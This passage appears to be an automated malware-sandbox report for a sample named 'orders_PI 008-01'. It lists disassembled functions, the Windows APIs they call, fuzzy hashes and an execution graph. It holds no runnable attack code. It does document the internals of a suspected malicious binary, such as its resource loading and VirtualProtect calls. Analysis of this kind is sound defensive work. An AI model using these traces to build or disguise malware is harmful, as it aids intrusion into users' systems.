                                        • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                        • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                        Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                        • wcsrchr.MSVCRT ref: 0040DCE9
                                        • wcscat.MSVCRT ref: 0040DCFF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileModuleNamewcscatwcsrchr
                                        • String ID: _lng.ini
                                        • API String ID: 383090722-1948609170
                                        • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                        • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                        • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                        • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                        Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                        • API String ID: 2773794195-880857682
                                        • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                        • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                        • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                        • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                        Function 0040A153 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                        • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: LongWindow
                                        • String ID: MZ@
                                        • API String ID: 1378638983-2978689999
                                        • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                        • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                        • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                        • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                        Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                        • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                        • memset.MSVCRT ref: 0042BAAE
                                        • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset
                                        • String ID:
                                        • API String ID: 438689982-0
                                        • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                        • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                        • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                        • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                        Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$memset
                                        • String ID:
                                        • API String ID: 1860491036-0
                                        • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                        • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                        • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                        • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                        Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcslen.MSVCRT ref: 0040A8E2
                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                        • free.MSVCRT ref: 0040A908
                                        • free.MSVCRT ref: 0040A92B
                                        • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$memcpy$mallocwcslen
                                        • String ID:
                                        • API String ID: 726966127-0
                                        • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                        • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                        • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                        • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                        Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcslen.MSVCRT ref: 0040B1DE
                                        • free.MSVCRT ref: 0040B201
                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                        • free.MSVCRT ref: 0040B224
                                        • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$memcpy$mallocwcslen
                                        • String ID:
                                        • API String ID: 726966127-0
                                        • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                        • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                        • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                        • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                        Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                          • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                          • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                          • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                        • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                        • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                        • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcmp$memcpy
                                        • String ID:
                                        • API String ID: 231171946-0
                                        • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                        • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                        • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                        • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                        Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strlen.MSVCRT ref: 0040B0D8
                                        • free.MSVCRT ref: 0040B0FB
                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                        • free.MSVCRT ref: 0040B12C
                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$memcpy$mallocstrlen
                                        • String ID:
                                        • API String ID: 3669619086-0
                                        • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                        • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                        • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                        • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                        Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                        • malloc.MSVCRT ref: 00417407
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                        • free.MSVCRT ref: 00417425
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$freemalloc
                                        • String ID:
                                        • API String ID: 2605342592-0
                                        • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                        • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                        • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                        • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                        Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcslen$wcscat$wcscpy
                                        • String ID:
                                        • API String ID: 1961120804-0
                                        • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                        • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                        • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                        • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                        Execution Graph

                                        Execution Coverage:2.4%
                                        Dynamic/Decrypted Code Coverage:19.9%
                                        Signature Coverage:0.5%
                                        Total number of Nodes:868
                                        Total number of Limit Nodes:22
                                        execution_graph 34101 40fc40 70 API calls 34274 403640 21 API calls 34102 427fa4 42 API calls 34275 412e43 _endthreadex 34276 425115 76 API calls __fprintf_l 34277 43fe40 133 API calls 34105 425115 83 API calls __fprintf_l 34106 401445 memcpy memcpy DialogBoxParamA 34107 440c40 34 API calls 34109 411853 RtlInitializeCriticalSection memset 34110 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34283 40a256 13 API calls 34285 432e5b 17 API calls 34287 43fa5a 20 API calls 34112 401060 41 API calls 34290 427260 CloseHandle memset memset 33168 410c68 FindResourceA 33169 410c81 SizeofResource 33168->33169 33172 410cae 33168->33172 33170 410c92 LoadResource 33169->33170 33169->33172 33171 410ca0 LockResource 33170->33171 33170->33172 33171->33172 34292 405e69 14 API calls 34117 433068 15 API calls __fprintf_l 34294 414a6d 18 API calls 34295 43fe6f 134 API calls 34119 424c6d 15 API calls __fprintf_l 34296 426741 19 API calls 34121 440c70 17 API calls 34122 443c71 44 API calls 34125 427c79 24 API calls 34299 416e7e memset __fprintf_l 34129 42800b 47 API calls 34130 425115 85 API calls __fprintf_l 34302 41960c 61 API calls 34131 43f40c 122 API calls __fprintf_l 34134 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34135 43f81a 20 API calls 34137 414c20 memset memset 34138 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34306 414625 18 API calls 34307 404225 modf 34308 403a26 strlen WriteFile 34310 40422a 12 API calls 34314 427632 memset memset memcpy 34315 40ca30 59 API calls 34316 404235 26 API calls 34139 42ec34 61 API calls __fprintf_l 34140 425115 76 API calls __fprintf_l 34317 425115 77 API calls __fprintf_l 34319 44223a 38 API calls 34146 43183c 112 API calls 34320 44b2c5 _onexit __dllonexit 34325 42a6d2 memcpy __allrem 34148 405cda 65 API calls 34333 43fedc 138 API calls 34334 4116e1 16 API calls __fprintf_l 34151 4244e6 19 API calls 34153 42e8e8 127 API calls __fprintf_l 34154 4118ee RtlLeaveCriticalSection 34339 43f6ec 22 API calls 34156 425115 119 API calls __fprintf_l 33158 410cf3 EnumResourceNamesA 34342 4492f0 memcpy memcpy 34344 43fafa 18 API calls 34346 4342f9 15 API calls __fprintf_l 34157 4144fd 19 API calls 34348 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34349 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34352 443a84 _mbscpy 34354 43f681 17 API calls 34160 404487 22 API calls 34356 415e8c 16 API calls __fprintf_l 34164 411893 RtlDeleteCriticalSection __fprintf_l 34165 41a492 42 API calls 34360 403e96 34 API calls 34361 410e98 memset SHGetPathFromIDList SendMessageA 34167 426741 109 API calls __fprintf_l 34168 4344a2 18 API calls 34169 4094a2 10 API calls 34364 4116a6 15 API calls __fprintf_l 34365 43f6a4 17 API calls 34366 440aa3 20 API calls 34368 427430 45 API calls 34172 4090b0 7 API calls 34173 4148b0 15 API calls 34175 4118b4 RtlEnterCriticalSection 34176 4014b7 CreateWindowExA 34177 40c8b8 19 API calls 34179 4118bf RtlTryEnterCriticalSection 34373 42434a 18 API calls __fprintf_l 34375 405f53 12 API calls 34187 43f956 59 API calls 34189 40955a 17 API calls 34190 428561 36 API calls 34191 409164 7 API calls 34379 404366 19 API calls 34383 40176c ExitProcess 34386 410777 42 API calls 34196 40dd7b 51 API calls 34197 425d7c 16 API calls __fprintf_l 34388 43f6f0 25 API calls 34389 42db01 22 API calls 34198 412905 15 API calls __fprintf_l 34390 403b04 54 API calls 34391 405f04 SetDlgItemTextA GetDlgItemTextA 34392 44b301 ??3@YAXPAX 34395 4120ea 14 API calls 3 library calls 34396 40bb0a 8 API calls 34398 413f11 strcmp 34202 434110 17 API calls __fprintf_l 34205 425115 108 API calls __fprintf_l 34399 444b11 _onexit 34207 425115 76 API calls __fprintf_l 34210 429d19 10 API calls 34402 444b1f __dllonexit 34403 409f20 _strcmpi 34212 42b927 31 API calls 34406 433f26 19 API calls __fprintf_l 34407 44b323 FreeLibrary 34408 427f25 46 API calls 34409 43ff2b 17 API calls 34410 43fb30 19 API calls 34219 414d36 16 API calls 34221 40ad38 7 API calls 34412 433b38 16 API calls __fprintf_l 34092 44b33b 34093 44b344 ??3@YAXPAX 34092->34093 34094 44b34b 34092->34094 34093->34094 34095 44b354 ??3@YAXPAX 34094->34095 34096 44b35b 34094->34096 34095->34096 34097 44b364 ??3@YAXPAX 34096->34097 34098 44b36b 34096->34098 34097->34098 34099 44b374 ??3@YAXPAX 34098->34099 34100 44b37b 34098->34100 34099->34100 34225 426741 21 API calls 34226 40c5c3 125 API calls 34228 43fdc5 17 API calls 34413 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34231 4161cb memcpy memcpy memcpy memcpy 33173 44b3cf 33174 44b3e6 33173->33174 33179 44b454 33173->33179 33174->33179 33186 44b40e GetModuleHandleA 33174->33186 33176 44b45d GetModuleHandleA 33180 44b467 33176->33180 33177 44b49a 33199 44b49f 33177->33199 33179->33176 33179->33177 33179->33180 33180->33179 33181 44b487 GetProcAddress 33180->33181 33181->33179 33182 44b405 33182->33179 33182->33180 33183 44b428 GetProcAddress 33182->33183 33183->33179 33184 44b435 VirtualProtect 33183->33184 33184->33179 33185 44b444 VirtualProtect 33184->33185 33185->33179 33187 44b417 33186->33187 33189 44b454 33186->33189 33218 44b42b GetProcAddress 33187->33218 33191 44b45d GetModuleHandleA 33189->33191 33192 44b49a 33189->33192 33198 44b467 33189->33198 33190 44b41c 33190->33189 33194 44b428 GetProcAddress 33190->33194 33191->33198 33193 44b49f 775 API calls 33192->33193 33193->33192 33194->33189 33195 44b435 VirtualProtect 33194->33195 33195->33189 33196 44b444 VirtualProtect 33195->33196 33196->33189 33197 44b487 GetProcAddress 33197->33189 33198->33189 33198->33197 33200 444c4a 33199->33200 33201 444c56 GetModuleHandleA 33200->33201 33202 444c68 __set_app_type __p__fmode __p__commode 33201->33202 33204 444cfa 33202->33204 33205 444d02 __setusermatherr 33204->33205 33206 444d0e 33204->33206 33205->33206 33227 444e22 _controlfp 33206->33227 33208 444d13 _initterm __getmainargs _initterm 33209 444d6a GetStartupInfoA 33208->33209 33211 444d9e GetModuleHandleA 33209->33211 33228 40cf44 33211->33228 33215 444dcf _cexit 33217 444e04 33215->33217 33216 444dc8 exit 33216->33215 33217->33177 33219 44b454 33218->33219 33220 44b435 VirtualProtect 33218->33220 33222 44b45d GetModuleHandleA 33219->33222 33223 44b49a 33219->33223 33220->33219 33221 44b444 VirtualProtect 33220->33221 33221->33219 33226 44b467 33222->33226 33224 44b49f 775 API calls 33223->33224 33224->33223 33225 44b487 GetProcAddress 33225->33226 33226->33219 33226->33225 33227->33208 33279 404a99 LoadLibraryA 33228->33279 33230 40cf60 33267 40cf64 33230->33267 33287 410d0e 33230->33287 33232 40cf6f 33291 40ccd7 ??2@YAPAXI 33232->33291 33234 40cf9b 33305 407cbc 33234->33305 33239 40cfc4 33323 409825 memset 33239->33323 33240 40cfd8 33328 4096f4 memset 33240->33328 33245 40d181 ??3@YAXPAX 33247 40d1b3 33245->33247 33248 40d19f DeleteObject 33245->33248 33246 407e30 _strcmpi 33249 40cfee 33246->33249 33352 407948 free free 33247->33352 33248->33247 33251 40cff2 RegDeleteKeyA 33249->33251 33252 40d007 EnumResourceTypesA 33249->33252 33251->33245 33254 40d047 33252->33254 33255 40d02f MessageBoxA 33252->33255 33253 40d1c4 33353 4080d4 free 33253->33353 33256 40d0a0 CoInitialize 33254->33256 33333 40ce70 33254->33333 33255->33245 33350 40cc26 strncat memset RegisterClassA CreateWindowExA 33256->33350 33260 40d1cd 33354 407948 free free 33260->33354 33262 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33351 40c256 PostMessageA 33262->33351 33264 40d061 ??3@YAXPAX 33264->33247 33268 40d084 DeleteObject 33264->33268 33265 40d09e 33265->33256 33267->33215 33267->33216 33268->33247 33271 40d0f9 GetMessageA 33272 40d17b CoUninitialize 33271->33272 33273 40d10d 33271->33273 33272->33245 33274 40d113 TranslateAccelerator 33273->33274 33276 40d145 IsDialogMessage 33273->33276 33277 40d139 IsDialogMessage 33273->33277 33274->33273 33275 40d16d GetMessageA 33274->33275 33275->33272 33275->33274 33276->33275 33278 40d157 TranslateMessage DispatchMessageA 33276->33278 33277->33275 33277->33276 33278->33275 33280 404ac4 GetProcAddress 33279->33280 33281 404aec 33279->33281 33282 404ad4 33280->33282 33283 404add FreeLibrary 33280->33283 33285 404b13 33281->33285 33286 404afc MessageBoxA 33281->33286 33282->33283 33283->33281 33284 404ae8 33283->33284 33284->33281 33285->33230 33286->33230 33288 410d17 LoadLibraryA 33287->33288 33289 410d3c 33287->33289 33288->33289 33290 410d2b GetProcAddress 33288->33290 33289->33232 33290->33289 33292 40cd08 ??2@YAPAXI 33291->33292 33294 40cd26 33292->33294 33295 40cd2d 33292->33295 33362 404025 6 API calls 33294->33362 33297 40cd66 33295->33297 33298 40cd59 DeleteObject 33295->33298 33355 407088 33297->33355 33298->33297 33300 40cd6b 33358 4019b5 33300->33358 33303 4019b5 strncat 33304 40cdbf _mbscpy 33303->33304 33304->33234 33364 407948 free free 33305->33364 33307 407cf7 33310 407a1f malloc memcpy free free 33307->33310 33311 407ddc 33307->33311 33313 407d7a free 33307->33313 33318 407e04 33307->33318 33368 40796e 7 API calls 33307->33368 33369 406f30 33307->33369 33310->33307 33311->33318 33377 407a1f 33311->33377 33313->33307 33365 407a55 33318->33365 33319 407e30 33320 407e57 33319->33320 33321 407e38 33319->33321 33320->33239 33320->33240 33321->33320 33322 407e41 _strcmpi 33321->33322 33322->33320 33322->33321 33383 4097ff 33323->33383 33325 409854 33388 409731 33325->33388 33329 4097ff 3 API calls 33328->33329 33330 409723 33329->33330 33408 40966c 33330->33408 33422 4023b2 33333->33422 33338 40ced3 33511 40cdda 7 API calls 33338->33511 33339 40cece 33343 40cf3f 33339->33343 33463 40c3d0 memset GetModuleFileNameA strrchr 33339->33463 33343->33264 33343->33265 33346 40ceed 33490 40affa 33346->33490 33350->33262 33351->33271 33352->33253 33353->33260 33354->33267 33363 406fc7 memset _mbscpy 33355->33363 33357 40709f 